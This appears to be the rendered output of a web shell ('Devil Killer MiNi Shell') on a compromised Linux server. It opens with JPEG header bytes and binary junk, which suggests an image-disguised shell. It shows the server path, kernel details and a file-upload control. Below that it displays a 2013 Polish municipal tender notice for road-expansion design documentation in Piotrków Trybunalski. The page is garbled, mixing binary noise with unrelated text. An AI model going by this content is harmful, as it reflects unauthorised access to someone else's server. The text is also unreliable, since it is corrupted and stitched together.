JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131211/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131211/512322-N-2013.html

<p class="kh_header"><b>Piotrków Trybunalski: ROZBUDOWĘ DROGI GMINNEJ NR 162047E DO UL. WOJSKA POLSKIEGO W PIOTRKOWIE TRYBUNALSKIM - DOKUMENTACJA PROJEKTOWA</b><br>
<b>Numer ogłoszenia: 512322 - 2013; data zamieszczenia: 11.12.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Piotrków Trybunalski , ul. Pasaż Rudowskiego 10, 97-300 Piotrków Trybunalski, woj. łódzkie, tel. 044 7327796, faks 044 7327798.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.piotrkow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ROZBUDOWĘ DROGI GMINNEJ NR 162047E DO UL. WOJSKA POLSKIEGO W PIOTRKOWIE TRYBUNALSKIM - DOKUMENTACJA PROJEKTOWA.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie koncepcji  oraz wykonanie projektów budowlanych i projektów  wykonawczych lub projektów budowlano-wykonawczych rozbudowy drogi gminnej na odcinku od ul. Modrzewskiego do ulicy Wojska Polskiego o długości ok. 950m wraz z budową i przebudową niezbędnej infrastruktury technicznej w ramach  zadania pn. Rozbudowa drogi gminnej nr 162047E  do ul. Wojska Polskiego w Piotrkowie Trybunalskim. 

I.  Wykonanie koncepcji drogowej wraz z niezbędną infrastrukturą techniczną  (2 - 3 warianty)
1.Plan orientacyjny w skali 1:10.000 i plan sytuacyjny w skali 1:1000,
2.Opis rozwiązań koncepcyjnych m.in. zakładaną konstrukcję budowy jezdni, skrzyżowań, chodnik dla pieszych, ścieżkę rowerową, zjazdy, oświetlenie uliczne, odwodnienia układu drogowego i terenów przyległych, obiektu inżynieryjnego przepustu przez rzekę Strawę, budowa zatok autobusowych, zieleń, mała architektura,  usunięcie  kolizji oraz objęcie opracowaniem skrzyżowania z ulicą Twardosławicką w formie ronda i skrzyżowania z  ulicą Wojska Polskiego (wariant z projektowanym rondem i wyprowadzeniem skrzyżowania na dwa pasy ruchu w kierunku północnym lub budowa sygnalizacji świetlnej), 
3.Ustalenie niezbędnych linii rozgraniczających teren inwestycji (o szerokościach wymaganych obowiązującymi przepisami), które będą podstawą do wystąpienia  o decyzję zrid,
4.Wykaz działek niezbędnych do wykupu w celu regulacji ulicy,
5.Uzgodnienia koncepcji projektowej: z Zarządem Dróg i Utrzymania Miasta                                  

II.1. Wykonanie mapy  do celów projektowych w skali 1:500 z dokonaniem kontroli usytuowania sieci podziemnych uzbrojenia terenu poprzez pomiar wszystkich elementów naziemnych sieci, 
2.Wykonanie badań podłoża gruntowego  i określenie warunków gruntowo-wodnych,
3.Sporządzenie karty informacyjnej o przedsięwzięciu i sporządzenie raportu o oddziaływaniu przedsięwzięcia  na środowisko oraz złożenie wniosku   o uzyskanie decyzji o środowiskowych uwarunkowaniach zgody na realizację przedsięwzięcia. W przypadku uzyskania z urzędu postanowienia o obowiązku sporządzenia Raportu o oddziaływaniu przedsięwzięcia na środowisko dla ww inwestycji, Wykonawca zobowiązuje się do jego wykonania w ramach zawartej umowy na opracowanie projektu budowlano-wykonawczego,
4.Opracowanie operatów  wodnoprawnych oraz złożenie wniosku o wydanie pozwoleń  wodnoprawnych,
5.Uzyskanie warunków technicznych do projektowania dla przebudowy/budowy infrastruktury technicznej i dla przepustu,
6.Załączniki wynikające z art. 11d - spec ustawy drogowej,
7.Projekt zagospodarowania terenu, 
8.Projekt budowlany i projekt wykonawczy lub projekt  budowlano-wykonawczy budowy drogi gminnej na odcinku od ulicy Modrzewskiego do ulicy Wojska Polskiego (minimum 1 jezdna o dwóch pasach ruchu) z podziałem na 2 oddzielne etapy celem uzyskania decyzji ZRID  i do realizacji tj.
Etap I - od ul. Modrzewskiego do ul. Twardosławickiej z rondem  z możliwością późniejszej rozbudowy na dwa pasy ruchu  oraz
Etap II - od ronda z ul. Twardosławicką do ul. Wojska Polskiego ze skrzyżowaniem i wyprowadzeniem 2 pasów ruchu w kierunku północnym obejmujące poniższe elementy w każdym z etapów: 
chodnik dla pieszych, ścieżka rowerowa, zjazdy, oświetlenie uliczne, odwodnienia układu drogowego i terenów przyległych, obiektu inżynieryjnego przepustu przez rzekę Strawę, przebudowa sieci wodociągowej, przebudowa i budowa przyłączy wodociągowych, przebudowa kanalizacji sanitarnej, przebudowa i budowa  przyłączy kanalizacji sanitarnej, budowa kanalizacji deszczowej, zatoki autobusowej, zieleń, mała architektura, 
9.Projekt budowlany i projekt wykonawczy lub projekt budowlano-wykonawczy obiektu inżynieryjnego przepustu  przez rzekę Strawę docelowo na dwie jezdnie, na które Wykonawca uzyska warunki,
10.Projekty rozbiórki budynków mieszkalnych i gospodarczych, kolidujących z inwestycją (jeżeli zajdzie taka konieczność),
11.Projekt budowlany i projekt wykonawczy  lub projekt budowlano-wykonawczy budowy kanalizacji deszczowej wraz z przyłączami  i wpustami w ulicy na odcinku od ulicy Wojska Polskiego do rzeki Strawy, na które Wykonawca uzyska warunki ,
12.Projekt budowlany i projekt wykonawczy lub projekt budowlano-wykonawczy przebudowy (budowy sieci wodociągowej i przebudowę-budowę przyłączy wodociągowych kolidującej z projektowaną drogą,  na które Wykonawca uzyska warunki,
13.Projekt budowlany i projekt wykonawczy lub projekt budowlano-wykonawczy przebudowy kanalizacji sanitarnej i przebudowa istniejących przyłączy kanalizacji sanitarnych oraz projekt przyłączy do posesji nie uzbrojonych , na które Wykonawca uzyska warunki,
14.Projekt budowlany i projekt wykonawczy lub projekt budowlano-wykonawczy usunięcia ewentualnych kolizji  i przebudowy istniejących sieci zgodnie z  warunkami do projektowania,
15.Projekt budowlany i projekt wykonawczy lub projekt budowlano-wykonawczy oświetlenia ulicznego wraz z zasilaniem, przebudowa linii napowietrznej w niezbędnym zakresie wynikającym z projektu drogowego i uzyskania przez Wykonawcę warunków technicznych,,
16.Inwentaryzacja zieleni oraz projekt zieleni niskiej i wysokiej,
17.Projekt organizacji ruchu na czas budowy i docelowy wraz z uzgodnieniem dla dwóch niezależnych etapów, 
18.Projekt rozgraniczenia gruntów pokrytych wodami od gruntów przyległych, w celu uzyskania decyzji ustalającej linię brzegu,
19.Przedmiary robót (dla każdego etapu i  branży osobno) ze szczegółowym opisem pozycji , 
20.Kosztorysy inwestorskie (dla każdego etapu i  branży osobno),
21.Specyfikacje techniczne wykonania i odbioru robot (dla każdego etapu osobno w branży drogowej,  sanitarnej, elektrycznej), 
22.Sporządzenie informacji dotyczącej bezpieczeństwa i ochrony zdrowia, ze względu na specyfikę projektowanego obiektu budowlanego, uwzględnionej w planie bezpieczeństwa i ochrony zdrowia (Dz.U.120  z 2003 r. poz. 1126),

III.Koncepcję drogową wraz z infrastrukturą techniczną i częścią kosztową dla każdego wariantu  (2 - 3 warianty) - 4 egz. + wersja elektroniczna

IV.Uzgodnioną dokumentację projektowo-kosztorysową należy wykonać osobno  z podziałem:  
- dokumentacja  dla odcinka od ul. Modrzewskiego do ul. Twardosławickiej - skrzyżowanie z ul. Twardoslawicką w formie ronda z możliwością późniejszej rozbudowy na dwa pasy ruchu, docelowym przepustem przez rzekę Strawę na dwie jezdnie, oświetlenie ulicy wraz z budową/przebudową niezbędnej  infrastruktury technicznej, budowa i przebudowa wodociągu i przyłączy wodociągowych , kanalizacji sanitarnej wraz z przyłączami, usunięcie ewentualnych kolizji  i przebudowę istniejących sieci , rozbiórka budynku (jeżeli zajdzie taka konieczność), chodnik, ścieżka rowerowa, oświetlenie, zatoka autobusowa, zieleń, mała architektura, organizacja ruchu na czas budowy i docelowo  - etap I 

- dokumentacja dla odcinka od ul. Twardosławickiej do ul. Wojska Polskiego-   na skrzyżowaniu z ul. Wojska Polskiego (sygnalizacja akomodacyjna) lub budowa ronda z wyprowadzeniem skrzyżowania na dwa pasy ruchu w kierunku północnym wraz z niezbędną budową/przebudową infrastruktury technicznej, budową kanalizacji deszczowej, budowa i przebudowa wodociągu i przyłączy wodociągowych, budowa i przebudowa kanalizacji sanitarnej i przyłączy sanitarnych, usunięcie ewentualnych kolizji  i przebudowę istniejących sieci, chodnik, ścieżka rowerowa, oświetlenie ulicy , rozbiórka budynku (jeżeli zajdzie taka konieczność), zatoka autobusowa, zieleń, mała architektura, organizacja ruchu na czas budowy i docelowo  - etap II

w ilości  :

1.Projekt zagospodarowania terenu z podziałem na 2 etapy - 8 egz. + wersja elektroniczna
2.Projekty budowlane i wykonawcze lub projekty budowlano-wykonawcze (dla każdego etapu)  -  6  egz. + wersja elektroniczna
3.Operaty wodnoprawne -  3  egz. + wersja elektroniczna
4.Projekt rozgraniczenia gruntów pokrytych wodami od gruntów przyległych  -  3  egz.  + wersja elektroniczna
5.Przedmiary robót (dla każdego etapu)  -  2  egz. + wersja elektroniczna
6.	Kosztorysy inwestorskie  -  2  egz. + wersja elektroniczna(wersja ath i pdf) (dla każdego etapu)                                               
7.Specyfikacje techniczne wykonania i odbioru robót  (dla każdego etapu)   -  4 egz. + wersja    elektroniczna
8.Karta  informacyjna o przedsięwzięciu (i raport oddziaływania na środowisko, jeżeli będzie taka konieczność)  -  4 egz. + wersja elektroniczna
9.Dokumentacja geotechniczna -  3 egz. + wersja elektroniczna
10.Organizacja ruchu (dla każdego etapu)  -  4 egz. + wersja elektroniczna
11.Załączniki  z art.11d spec ustawy drogowej  -  po 2 kpl (dla każdego etapu) 
                                              
V.Dokumentacja projektowo-kosztorysowa zostanie opracowana w sposób i w zakresie umożliwiającym uzyskanie decyzji zrid oraz będzie zgodna  z przepisami:
-Rozporządzeniem Ministra Transportu, Budownictwa i Gospodarki Morskiej z dnia 25 kwietnia 2012 r. w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz.U.poz.462),
-Rozporządzeniem  z dnia 10 kwietnia 2003 r. o szczegółowych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych (Dz. U.  z 2008 r. Nr 193 poz.1194),
-Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r.  w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz. U. Nr 202 z 2004 r. poz.2072 z późniejszymi zmianami), 
- Rozporządzeniem Ministra Infrastruktury z dnia 18 maja  2004r.   w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno - użytkowym (Dz. U. Nr 130 z 2004 r. poz. 1389 z późniejszymi zmianami),
-Ustawą Prawo wodne z dnia 18 lipca 2001 r. - Dz. U. z 2012r., poz.145 z póź. zmianami, 
-Ustawą Prawo budowlane z dnia 7 lipca 1994 r. Dz.U.2010.243.1623 ze zmianami,
-Rozporządzeniem Ministra  Środowiska z dnia 24 lipca 2006 r. w sprawie warunków, jakie należy spełnić przy wprowadzaniu ścieków do wód i ziemi oraz w sprawie substancji szczególnie szkodliwych dla środowiska wodnego,
- Rozporządzeniem Rady Ministrów z 9 listopada 2004 r. w sprawie określenia rodzajów przedsięwzięć mogących znacząco oddziaływać na środowisko oraz szczegółowych uwarunkowań związanych z kwalifikowaniem przedsięwzięcia do sporządzenia raportu o oddziaływaniu na środowisko.

Ponadto:

-Projektant jest zobowiązany do zachowania szczególnej ostrożności   w zakresie ochrony znaków osnowy geodezyjnej. W przypadku jeżeli realizacja projektowanej inwestycji nie może się obyć bez zniszczenia znaków, w kosztorysie inwestorskim należy przewidzieć koszty ich odtworzenia. Ponadto w kosztorysie inwestorskim należy przewidzieć koszty przejęcia stanu znaków osnowy geodezyjnej przed  i po wejściu Wykonawcy na plac budowy. 
-W kosztorysie inwestorskim i przedmiarze należy dla projektowanych przyłączy uwzględnić odcinek od sieci do granic posesji, 
-Projektant jest zobowiązany do uzgodnienia z właścicielem posesji lokalizacji zjazdów na posesje  oraz przebieg przyłączy do budynków (należy załączyć oświadczenia w przypadku zmiany lokalizacji lub budowy nowych).
-Przy wystąpieniu kolizji z istniejącą infrastrukturą, Projektant uzyska niezbędne warunki techniczne dla jej przebudowy.
-Projektant uzyska niezbędne uzgodnienia:  z PWiK, ZDiUM, PGE, WZMiUW, ZUDP, Komendą Policji, gestorami sieci.
-Uzyskanie od gestorów sieci  - zgodę na umieszczenie urządzeń  w pasie drogowym nie związanym z potrzebami ruchu drogowego.
-Projektant uzyska wypisy z rejestru gruntów oraz mapy d-c opiniodawczych.
-Udzielanie wszelkich informacji i wyjaśnień dotyczących dokumentacji.
-W żadnym opracowaniu nie mogą wystąpić nazwy własne użytych materiałów i wyrobów ani nazwy producentów, które mogłyby utrudnić uczciwą konkurencję zgodnie z art. 29 i art. 30 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych.
-Wykonawca zobowiązuje się raz w miesiącu tj. do dnia 20 każdego miesiąca do przedłożenia raportu z postępu zaawansowania prac.   W przypadku braku postępu prac, Inwestor może odstąpić od umowy..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.32.20.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Sposób dokonania oceny spełnienia wymaganych warunków:
- przy dokonaniu oceny spełniania warunków zamawiający będzie się kierował regułą: spełnia albo nie spełnia,
- niespełnienie chociażby jednego warunku skutkować będzie wykluczeniem wykonawcy z postępowania; ofertę wykonawcy wykluczonego uznaje się za odrzuconą.
Ocena spełniania powyższych warunków nastąpi na podstawie oświadczeń lub dokumentów zawartych w ofercie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykaże co najmniej dwa zamówienia (wykonane w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie) odpowiadające rodzajem przedmiotowi niniejszego zamówienia tj.
- wykonanie dwóch usług polegających na opracowaniu projektów drogowych z sieciami infrastruktury technicznej tj. wodociągiem lub kanalizację sanitarną lub kanalizację deszczową i elektroenergetyczną  na kwotę nie mniejszą niż 20.000,00 zł brutto każda - wg załącznika nr 4.
Załączy dokumenty potwierdzające, że  dostawy wskazanych w załączniku nr 4  zostały wykonane lub są wykonywane należycie.


Sposób dokonania oceny spełnienia wymaganych warunków:
- przy dokonaniu oceny spełniania warunków zamawiający będzie się kierował regułą: spełnia albo nie spełnia,
- niespełnienie chociażby jednego warunku skutkować będzie wykluczeniem wykonawcy z postępowania; ofertę wykonawcy wykluczonego uznaje się za odrzuconą.
Ocena spełniania powyższych warunków nastąpi na podstawie oświadczeń lub dokumentów zawartych w ofercie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Sposób dokonania oceny spełnienia wymaganych warunków:
- przy dokonaniu oceny spełniania warunków zamawiający będzie się kierował regułą: spełnia albo nie spełnia,
- niespełnienie chociażby jednego warunku skutkować będzie wykluczeniem wykonawcy z postępowania; ofertę wykonawcy wykluczonego uznaje się za odrzuconą.
Ocena spełniania powyższych warunków nastąpi na podstawie oświadczeń lub dokumentów zawartych w ofercie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, a także zakresu wykonywanych przez nich czynności oraz informacją o podstawie do dysponowania tymi osobami:
- posiadają uprawnienia niezbędne do wykonania określonych prac lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień (branża drogowa, sanitarna, elektryczna)  wg załącznika nr 5.


Sposób dokonania oceny spełnienia wymaganych warunków:
- przy dokonaniu oceny spełniania warunków zamawiający będzie się kierował regułą: spełnia albo nie spełnia,
- niespełnienie chociażby jednego warunku skutkować będzie wykluczeniem wykonawcy z postępowania; ofertę wykonawcy wykluczonego uznaje się za odrzuconą.
Ocena spełniania powyższych warunków nastąpi na podstawie oświadczeń lub dokumentów zawartych w ofercie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Sposób dokonania oceny spełnienia wymaganych warunków:
- przy dokonaniu oceny spełniania warunków zamawiający będzie się kierował regułą: spełnia albo nie spełnia,
- niespełnienie chociażby jednego warunku skutkować będzie wykluczeniem wykonawcy z postępowania; ofertę wykonawcy wykluczonego uznaje się za odrzuconą.
Ocena spełniania powyższych warunków nastąpi na podstawie oświadczeń lub dokumentów zawartych w ofercie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	Kompletna oferta musi zawierać:
1.	Formularz ofertowy według wzoru zawartego w specyfikacji istotnych warunków zamówienia - wg załącznika nr 1.
2.	Stosowne pełnomocnictwo(a) - w przypadku, gdy upoważnienie do podpisania oferty nie wynika bezpośrednio ze złożonego w ofercie odpisu z właściwego rejestru albo zaświadczenia o wpisie do ewidencji działalności gospodarczej (należy załączyć oryginał lub kserokopię potwierdzoną przez notariusza).
